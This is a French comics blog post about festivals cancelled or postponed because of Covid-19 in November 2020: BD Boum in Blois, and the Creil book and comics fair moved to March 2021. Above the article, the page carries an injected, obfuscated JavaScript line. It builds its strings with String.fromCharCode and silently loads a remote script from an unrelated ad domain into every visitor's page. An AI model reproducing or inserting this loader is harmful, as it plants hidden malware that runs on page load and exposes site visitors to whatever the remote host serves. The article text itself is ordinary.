Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Festival d’annulation des manifestations autour de la bande dessinée

    On s’en souviendra de cette “année de la bande dessinée 2020”. Pas de bol, pour une fois qu’une reconnaissance officielle notable était apportée au “9e art”, il a fallu qu’un pernicieux virus vienne perturber les réjouissances, annulant successivement les grandes manifestations prévues dans ce cadre et les autres rendez-vous rituels du genre.

    Fin septembre, on a ainsi eu la confirmation que le Festival d’Angoulême 2021 était annulé (du moins dans sa forme “présentielle”, selon le néologisme hélas à succès du moment).

    Plus proche, en cette seconde quinzaine de novembre, ce sont deux autres festivals attachants qui n’auront pas lieu.

    Pas de festival, mais une remise de prix à BD Boum Blois

    Une lecture rétrospective donne un côté prémonitoire au dessin d’Emile Bravo, affiche du festival BD Boum de Blois de cette année: le pont est coupé et il ne sera pas possible de rejoindre la manifestation du Loir-et-Cher, lors du week-end des 21 et 22 novembre. Pas à cause des stukas nazis mais du confinement induit par la bataille contre le Covid-19.

    Après plusieurs tentatives de reconfiguration, les organisateurs ont dû, comme les autres, admettre que le 37e festival de bande dessinée n’aurait donc pas lieu.

    En revanche, les expos programmés autour de ce rendez-vous seront accueillies à la Maison de la BD dès sa réouverture. Le grand escalier monumental Denis-Papin, décoré aux couleurs de Mickey de Régis Loisel “est visible lors de votre déplacement quotidien d’une heure” et les différents prix seront annoncés sur le site et les réseaux sociaux, samedi 21 novembre à 19 heures.

    Le Salon du livre de Creil remis à fin mars

    Autre rendez-vous littéraire, plus général, mais donnant un éclairage accentué sur la bande dessinée lors de ses dernières éditions: le Salon du livre et de la bande dessinée de Creil, dans l’Oise. Celui-ci devait tenir son 40e édition durant ce même week-end des 21 et 22 novembre. Une édition anniversaire qui mettait justement le dessin et l’image à l’honneur à travers le choix du thème de “l’Art” et d’une affiche évocatrice de Xavier Coste (primé l’an passé, en BD, pour A comme Eiffel).

    Côté bande dessinée, le festival annonçait notamment deux table-rondes sur, justement, « La BD, le 9ème des Arts » avec Olivier Berlion, Serge Le Tendre et Timothée Leman, ainsi que « Quand la BD évoque les artistes », avec Alice Chemama (dessinatrice des Zola), Xavier Coste (auteur d’Egon Schiele ou Rimbaud l’indésirable) et David François (pour son récent Chaplin en Amérique). Et d’autres auteurs étaient annoncés en rencontres-dédicaces, dont Dawid, Renaud Dillies, Erroc, Kokor, Greg Tessier, etc.

    Accusant le “coup dur pour la culture, et en particulier pour le monde du livre que nous représentons. Un monde pourtant indispensable pour combattre la barbarie, lutter contre l’obscurantisme et tenter, coûte que coûte, de faire société“, les organisateurs ont décidé de reprogrammer ce festival du 26 au 28 mars 2021.

    Et, comme le dit encore Sylviane Leonetti, directrice de La Ville aux livres, l’association organisatrice: “Tentons de faire en sorte que cette épreuve, que nous traversons tous, soit source de recommencement, de résilience. La Culture est « consubstantielle » de notre Liberté. Et parce que le livre et la lecture sont et demeureront des socles incontournables pour bâtir une démocratie libre, nous allons prendre ensemble un nouveau départ. Espérons de tout cœur que la situation sanitaire nous permette de poursuivre cet engagement.

    Des propos et un souhait qui peuvent être généralisés pour tous les salons.

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Les dames de Paul Gillon s’exposent à Paris pendant un mois

    La galerie Champaka accueille une expo-vente consacrée à une partie de l’oeuvre du défunt ...

    Charlie… encore

    Si dans la société, la situation reste calme (hormis l’appel d’un déséquilibré charentais à ...

    Viva la revolución ! avec Kris et Maël

    Notre amérique, deuxième mouvement: un printemps mexicain. Editions futuropolis, 64 pages, 16 euros. A ...

    Ekhö à l’heure du thé à Londres

    Ekhö monde-miroir, tome 7: Swinging London, Christophe Arleston (scénario), Alessandro Barbucci (dessin). Editions Soleil, ...

    Dillies et Hautière dans Le Labyrinthe

    Ce fut l’une des plus belles surprises de l’année 2011. Un diptyque poétique aussi ...

    Carnage tragique à “Charlie Hebdo” : 12 morts (hélas)

    Hallucinant et effroyable, ce qui vient de se passer dans les locaux de Charlie ...